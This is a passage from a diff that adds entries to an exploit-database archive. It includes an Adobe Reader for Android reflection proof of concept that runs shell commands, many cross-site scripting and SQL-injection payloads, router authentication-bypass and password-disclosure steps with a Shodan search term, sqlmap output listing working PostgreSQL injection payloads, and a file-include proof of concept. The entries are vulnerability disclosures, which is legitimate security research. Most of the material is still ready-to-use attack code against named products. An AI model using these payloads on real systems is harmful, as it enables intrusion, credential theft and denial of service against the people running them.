this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(),
"_event");
this.mWebView.addJavascriptInterface(new ARJavaScriptField(),
"_field");
this.mWebView.setWebViewClient(new ARJavaScript.1(this));
this.mWebView.loadUrl("file:///android_asset/javascript/index.html");
}
An attacker can create a specially crafted PDF file containing
Javascript that runs when the target user views (or interacts with)
this PDF file. Using any of the Javascript objects listed above
provides the attacker access to the public Reflection APIs inherited
from Object. These APIs can be abused to run arbitrary Java code.
------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept [5] will create a text file in the app
sandbox.
function execute(bridge, cmd) {
return bridge.getClass().forName('java.lang.Runtime')
.getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}
if(window._app) {
try {
var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
execute(window._app, ['/system/bin/sh','-c','echo \"Lorem
ipsum\" > '
+ path]);
window._app.alert(path + ' created', 3);
} catch(e) {
window._app.alert(e, 0);
}
}
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
http://www.securify.nl/advisory/SFY20140401/adobe_reader_for_android_exposes_insecure_javascript_interfaces.html
[2] https://play.google.com/store/apps/details?id=com.adobe.reader
[3]
http://developer.android.com/reference/android/webkit/JavascriptInterface.html
[4]
http://www.adobe.com/devnet-docs/acrobatetk/tools/Mobile/js.html#supported-javascript-apis
[5] http://www.securify.nl/advisory/SFY20140401/mobilereader.poc.pdf

9
platforms/asp/webapps/32833.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33957/info
Blogsa is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Blogsa 1.0 Beta 3 is vulnerable; other versions may also be affected.
http://www.example.com/Widgets.aspx?w=Search&p=do&searchText=<script>alert(document.cookie)</script>

9
platforms/asp/webapps/32874.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34227/info
BlogEngine.NET is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
BlogEngine.NET 1.4 is vulnerable; other versions may also be affected.
http://www.example.com/blog/search.aspx?q="><script>alert(&#039;ImBeded%20JS&#039;)</script>

9
platforms/asp/webapps/32882.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34341/info
SAP Business Objects Crystal Reports is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
NOTE: This issue may be related to the one described in BID 12107 (Business Objects Crystal Enterprise Report File Cross-Site Scripting Vulnerability). We will update or retire this BID when more information emerges.
https://www.example.com/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect

13
platforms/asp/webapps/32888.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/34349/info
Asbru Web Content Management is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Asbru Web Content Management 6.5 and 6.6.9 are vulnerable; other versions may also be affected.
http://www.example.com/page.asp?id=1
http://www.example.com/page.asp?id=1 AND 1=2
http://www.example.com/page.asp?id=1 AND 1=1
http://www.example.com/webadmin/login.asp?url="><script>alert(document.cookie)</script>

11
platforms/asp/webapps/32898.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34463/info
Absolute Form Processor XE is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Absolute Form Processor XE 1.5 is vulnerable; other versions may also be affected.
The following example input is available:
username: ' or '1=1

9
platforms/asp/webapps/32903.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34491/info
People-Trak is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example data is available:
username: ' or 1=(Select top 1 WAM_UserID from WebAppMgrs)--

12
platforms/cgi/webapps/32870.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/34159/info
AWStats is prone to a path-disclosure vulnerability.
Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer.
The following are vulnerable:
AWStats 6.5 (build 1.857) and prior
WebGUI Runtime Environment 0.8.x and prior
http://www.example.com/awstats/awstats.pl?config=HACKdestailleur.fr

11
platforms/cgi/webapps/32907.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34507/info
Banshee DAAP Extension is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
DAAP Extension for Banshee 1.4.2 is vulnerable; other versions may also be affected.
The following example URI is available:
http://www.example.com:8089/[xss-here]

26
platforms/hardware/remote/32878.txt Executable file
View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/34307/info
Cisco ASA is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Cisco ASA software versions 8.0.4(2B) and prior running on ASA 5500 Series Adaptive Security Appliances are vulnerable.
POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.example.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://www.example.com/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66
username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=

32
platforms/hardware/webapps/32859.txt Executable file
View file

@ -0,0 +1,32 @@
# Title : Sagem F@st 3304-V2 Authentification Bypass
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested on : Firefox, Google Chrome, Internet Explorer
# Tested Router : Sagem F@st 3304-V2 (3304, 3464, 3504 may also be affected)
# Date : 2014-09-04
# Author : Yassine Aboukir
# Contact : Yaaboukir@gmail.com
# Blog : http://linkedin.com/pub/yassine-aboukir/43/900/1b3
-----------
# Vulnerability description: : Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The router is vulnerable to an authentification bypass bug which allows unprivileged users to modify the preconfigured root password then log in with administrator permissions.
The default URL to access to the web management interface is http://192.168.1.1 but this attack can also be performed by an axternal attacker who connects to the router's public IP address.
# Exploit :
The vulnerability can be exploited by running javascript code in the web browser bar which allows to access password change page without having permession to do so.
--- Using Chrome, Internet Explorer browser :
You first need to access the router login page http://192.168.1.1/(without loging in)
Then execute the following javascript in the URL bar : javascript:mimic_button('goto: 9096..')
--- Using Firefox :
Because running javascript in the url bar has been disabled in Mozilla Firefox, we will try another way :
You first need to access the router login page http://192.168.1.1/(without loging in)
1st Method :
You have to bookmark the javascript: link before it can be executed.
---- Show all Bookmarks (Ctrl+Shift+B)
---- Select folder (e.g. Bookmarks Toolbar)
---- Click Organize-> New bookmark .. and enter javascript:mimic_button('goto: 9096..') in the address field.
2nd Method :
The web console tool (CTRL + SHIFT + K), in which you can interpret javascript expressions in real time using the command line provided by the Web Console.

105
platforms/hardware/webapps/32883.txt Executable file
View file

@ -0,0 +1,105 @@
Title: Multiple vulnerabilities in NETGEAR N600 WIRELESS DUAL BAND WNDR3400
====================================================================================
Notification Date: 4/14/2014
Affected Vendor: NETGEAR N600 WIRELESS DUAL BAND WNDR3400
Firmware Version: Firmware Version 1.0.0.38 AND BELOW (ALL versions affected)
Issue Types: password Disclosure File Uploading with AuthPPOPE settings Change
Discovered by: Santhosh Kumar twitter: @security_b0x
Issue status: No Patch >From the Vendors.
grettings: @Anami2111 (anamika singh) -- creator of wihawk
====================================================================================
Summary:
========
While i was lurking around the Netgear firmware today i came across various tweaking and others i was able to find a password disclosure,File uploading vulnerably which could compromise the entire router.as of now no patch from the vendor.
Password Disclosure:
====================
url: server/unauth.cgi?id=393087602
Generating with the 401 unauthorised error
poc:
Host: server:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server:8080/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0<p class="MNUTitle">Router Password Recovered</p>
<table border="0" cellpadding="0" cellspacing="3" style="width:600px">
<col width="200" />
<col width="400" />
<tr>
<td colspan="2" class="MNUText">You have successfully recovered the admin password.</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Username</td>
<td class="MNUText" align="left">admin</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Password</td>
<td class="MNUText" align="left">password</td>
</tr>
\<tr>
poc2:
server:8080/passwordrecovered.cgi?id=1738955828
<tr>
<td colspan="2" class="MNUText">You have successfully recovered the admin password.</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Username</td>
<td class="MNUText" align="left">admin</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Password</td>
<td class="MNUText" align="left">0514</td>
</tr>
<tr>
<td colspan="2" class="MNUText">You can now log in to the router using username "admin" and this recovered password.</td>
</tr>
<tr>
==============================================================================================================================
Ppope account reset:
Netgear runs a utility called "netgear genie" which does not have proper authentication on reaching "genie_pppoe.htm "
which allows to reset the ppoe username which any basic authentication.
http://server/genie_pppoe.htm
==============================================================================================================================
File Upload (router reset):
like the same one above the "http://server/genie_restore.htm"
the config file can be uploaded which leading to reseting the control to attackers username and password.
*.cfg file.
==============================================================================================================================
SHODAN DORK:
wndr3400: 10198 for wndr3400
******************************************************************************************************************************

127
platforms/hardware/webapps/32886.txt Executable file
View file

@ -0,0 +1,127 @@
The following request is vulnerable to a SQL injection in the last URI segment:
GET /docushare/dsweb/ResultBackgroundJobMultiple/1 HTTP/1.1
Host: 172.31.16.194:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.31.16.194:8080/docushare/dsweb/DeleteConfirmation/1/Collection-14/Services
Cookie: JSESSIONID=AB82A86859D9C65475DDE5E47216F1A0.tomcat1; AmberUser=64.980A91BBF9D661CB800C2CE5FCCE924AEF4D51CF0280B319873BC31AF0705F0F21.1svt4r2doj13hhu1dc7kf
Connection: keep-alive
Response (goodies):
<div id="error_vdftitle">
<h2><font color="#DD3333">System Error </font></h2>
</div>
<div id="content">
<form name="ERROR" method="post" action="/docushare/dsweb/ApplyError">
<table cellpadding="1" cellspacing="1">
<tr><td><b>Error Code: 1501</b></td></tr>
<tr><td><b><i>SQL error.</i></b></td></tr>
</table>
<input type="hidden" name="dsexception" value="yes" />
<input type="hidden" name="dserrorcode" value="1501" />
<input type="hidden" name="detail_message" value="SQL error." />
<br />
<input type="hidden" name="message" value="Error doing the getBackgroundJobInfo query; nested exception is:
org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near &#34;&#39;1&#34;
Error doing the getBackgroundJobInfo query; nested exception is:
org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near &#34;&#39;1&#34;
" />
<input type="hidden" name="stacktrace" value="com.xerox.docushare.db.DatabaseException: Error doing the getBackgroundJobInfo query; nested exception is:
org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near &#34;&#39;1&#34;
at com.xerox.docushare.db.jdbc.DbConnectionJDBC.getBackgroundJobInfo(DbConnectionJDBC.java:18440)
at com.xerox.docushare.impl.server.BackendSessionImpl.getBackgroundJobInfo(BackendSessionImpl.java:13022)
at sun.reflect.GeneratedMethodAccessor59.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
at java.lang.reflect.Method.invoke(Method.java:597)
at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:305)
at sun.rmi.transport.Transport$1.run(Transport.java:159)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Transport.java:155)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:535)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(TCPTransport.java:790)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:649)
at java.util.concurrent.ThreadPoolExecutor$Worker.runTask(ThreadPoolExecutor.java:886)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:908)
at java.lang.Thread.run(Thread.java:662)
" />
<input type="hidden" name="redirectTo" value="SystemError" />
---------------------------------------
quick sqlmap run:
bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=postgres
sqlmap/1.0-dev-e8c1c90 - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:28:49
[09:28:49] [INFO] parsing HTTP request from '/tmp/req.req'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q]
[09:28:50] [INFO] testing connection to the target URL
[09:28:51] [INFO] testing NULL connection to the target URL
[09:28:51] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:28:52] [INFO] target URL is stable
[09:28:52] [INFO] testing if URI parameter '#1*' is dynamic
[09:28:52] [INFO] confirming that URI parameter '#1*' is dynamic
[09:28:52] [WARNING] URI parameter '#1*' does not appear dynamic
[09:28:52] [INFO] testing for SQL injection on URI parameter '#1*'
[09:28:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:28:52] [WARNING] reflective value(s) found and filtering out
[09:28:53] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[09:28:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:28:53] [INFO] URI parameter '#1*' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[09:28:53] [INFO] testing 'PostgreSQL inline queries'
[09:28:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[09:28:53] [WARNING] time-based comparison requires larger statistical model, please wait........
[09:29:04] [INFO] URI parameter '#1*' seems to be 'PostgreSQL > 8.1 stacked queries' injectable
[09:29:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:29:14] [INFO] URI parameter '#1*' seems to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[09:29:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:29:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:29:14] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:29:14] [INFO] target URL appears to have 10 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[09:29:31] [INFO] testing 'Generic UNION query (49) - 22 to 40 columns'
[09:29:33] [INFO] testing 'Generic UNION query (49) - 42 to 60 columns'
[09:29:34] [INFO] testing 'Generic UNION query (49) - 62 to 80 columns'
[09:29:36] [INFO] testing 'Generic UNION query (49) - 82 to 100 columns'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 155 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://172.31.16.194:8080/docushare/dsweb/ResultBackgroundJobMultiple/1 AND 6164=6164
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: http://172.31.16.194:8080/docushare/dsweb/ResultBackgroundJobMultiple/1 AND 7298=CAST((CHR(113)||CHR(113)||CHR(108)||CHR(115)||CHR(113))||(SELECT (CASE WHEN (7298=7298) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(109)||CHR(121)||CHR(113)) AS NUMERIC)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries
Payload: http://172.31.16.194:8080/docushare/dsweb/ResultBackgroundJobMultiple/1; SELECT PG_SLEEP(5)--
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: http://172.31.16.194:8080/docushare/dsweb/ResultBackgroundJobMultiple/1 AND 3994=(SELECT 3994 FROM PG_SLEEP(5))
---
[09:30:04] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[09:30:04] [INFO] fetched data logged to text files under '/home/bperry/tools/sqlmap/output/172.31.16.194'
[*] shutting down at 09:30:04
bperry@ubuntu:~/tools/sqlmap$

269
platforms/ios/webapps/32866.txt Executable file
View file

@ -0,0 +1,269 @@
Document Title:
===============
PDF Album v1.7 iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1255
Release Date:
=============
2014-04-11
Vulnerability Laboratory ID (VL-ID):
====================================
1255
Common Vulnerability Scoring System:
====================================
7.3
Product & Service Introduction:
===============================
Here is a creative way to record an idea, a page in a book or newspapers, what you learned, even a travel memory. You can get content from camera,
image or text editor, then pick them up into a pdf file and compose them as you wish. You can order the pages in project, then save the project
and open it again when you want to add or change it. You can get pdfs via WIFI or read them in this app.
(Copy of the Homepage: https://itunes.apple.com/ch/app/pdf-album/id590232990 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official PDF Album v1.7 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-04-11: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Lintao Zhao
Product: PDF Album - iOS Mobile Application 1.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official PDF Album v1.7 iOS mobile web-application. The local file include
web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise
the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs
in the `pdf album index item` list context. The attacker can inject the local file include request by usage of the `wifi interface` or by a local
privileged application user account via `folder sync`.
Attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different
local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. The security
risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.8(+)|(-)6.9.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST] - Remote
[+] [SYNC] - Local
Vulnerable Module(s):
[+] Browse File > Upload
Vulnerable Parameter(s):
[+] filename.*.pdf
Affected Module(s):
[+] PDF Album - Index Item Listing (http://localhost:8808/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers with low privileged user account without required user interaction.
For security demonstration or to reproduce the local file include vulnerability follow the provided information and steps below to continue.
PoC: Exploit Code
<table cellpadding="0" cellspacing="0" border="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr></thead>
<tbody id="filelist">
<tr><td><a href="/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf" class="file">
>"<./[LOCAL FILE INCLUDE VULNERABILITY VIA PDF ALBUMNAME!">.pdf</a></td><td class='del'>
<form action='/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf' method='post'><input name='_method' value='delete' type='hidden'/>
<input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr>
<tr class="shadow"><td><a href="/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf"
class="file">%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf</a></td><td class="del">
<form action="/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf" method="post">
<input name="_method" value="delete" type="hidden"><input name="commit" value="Delete" class="button" type="submit"></form></td></tr></tbody></table>
PoC: Vulnerable Source
<script type="text/javascript" charset="utf-8">
var now = new Date();
$.getJSON("/files?"+ now.toString(),
function(data){
var shadow = false;
$.each(data, function(i,item){
var trclass='';
if (shadow)
trclass= " class='shadow'";
encodeName = encodeURI(item.name).replace("'", "'");
$("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + "</a></td>" + "<td class='del'><form action='/files/" + encodeName + "' method='post'><input name='_method' value='delete' type='hidden'/><input name=\"commit\" type=\"submit\" value=\"Delete\" class='button' /></td>" + "</tr>").appendTo("#filelist");
shadow = !shadow;
});
});
</script>
PoC Link:
http://localhost:8808/files/%3E%22%3C[FILE INCLUDE VULNERABILITY!]%3E.pdf
--- PoC Session Logs [POST] ---
Injection via Wifi UI > Upload (iChm File Management)
14:44:34.743[170ms][total 170ms] Status: 302[Found]
POST http://192.168.2.104:8808/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[192.168.2.104:8808]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:8808/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------1145570518587
Content-Disposition: form-data; name="newfile"; filename="%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png
Note: A local injection by usage of the app album name value is also possible via regular sync!
--- PoC Session Logs [GET] ---
Execution PDF Album (iChm File Management)
14:43:20.010[836ms][total 1106ms] Status: 200[OK]
GET http://192.168.2.104:8808/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2773] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104:8808]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2773]
Date[Do., 10 Apr. 2014 12:54:15 GMT]
14:43:20.874[48ms][total 48ms] Status: 200[OK]
GET http://192.168.2.104:8808/jquery.js Load Flags[VALIDATE_ALWAYS ] Gr??e des Inhalts[55774] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104:8808]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:8808/]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[55774]
Date[Do., 10 Apr. 2014 12:54:15 GMT]
14:43:21.062[41ms][total 41ms] Status: 200[OK]
GET http://192.168.2.104:8808/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY!].*; Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104:8808]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:8808/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Do., 10 Apr. 2014 12:54:15 GMT]
Reference(s):
http://localhost:8808/files/
http://localhost:8808/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and restriction of the vulnerable filename value in the upload POST method request.
Encode and filter also the output name value for item list to prevent application-side executions and malicious injected context via POST method.
Security Risk:
==============
The security risk of the local file include web vulnerability in the mobile application is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

11
platforms/java/dos/32860.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34150/info
Sun Java System Calendar Server is prone to a denial-of-service vulnerability because it fails to handle certain duplicate URI requests.
An attacker can exploit this issue to crash the Calendar Server, resulting in a denial-of-service condition.
NOTE: Versions prior to Sun Java System Calendar Server 6.3 are not vulnerable.
The following example data is available:
https://www.example.com:3443/?tzid=crash

9
platforms/java/webapps/32818.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33912/info
JOnAS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
JOnAS 4.10.3 is vulnerable; other versions may also be affected.
http://www.example.com:9000/jonasAdmin/ListMBeanDetails.do?select=jonas%3Aj2eeType<script>alert('DSecRG%20XSS')</script>%3DEJBModule%2Cj2eeType<script>alert('DSecRG%20XSS')</script>%3DEJBModule

7
platforms/java/webapps/32821.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33924/info
APC PowerChute Network Shutdown is prone to an HTTP-response-splitting vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
1 XSS: GET /security/applet?referrer=>"'><img/src="javascript:alert('DSECRG_XSS')"> 2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page" Example ******* GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0 response: HTTP/1.0 302 Moved temporarily Content-Length: 0 Date: ??~B, 25 ?~A?? 2008 10:47:42 GMT Server: Acme.Serve/v1.7 of 13nov96 Connection: close Expires: 0 Cache-Control: no-cache Content-type: text/html Location: help/english/Foobar? DSECRG_HEADER:testvalue Content-type: text/html

9
platforms/java/webapps/32858.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34140/info
Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
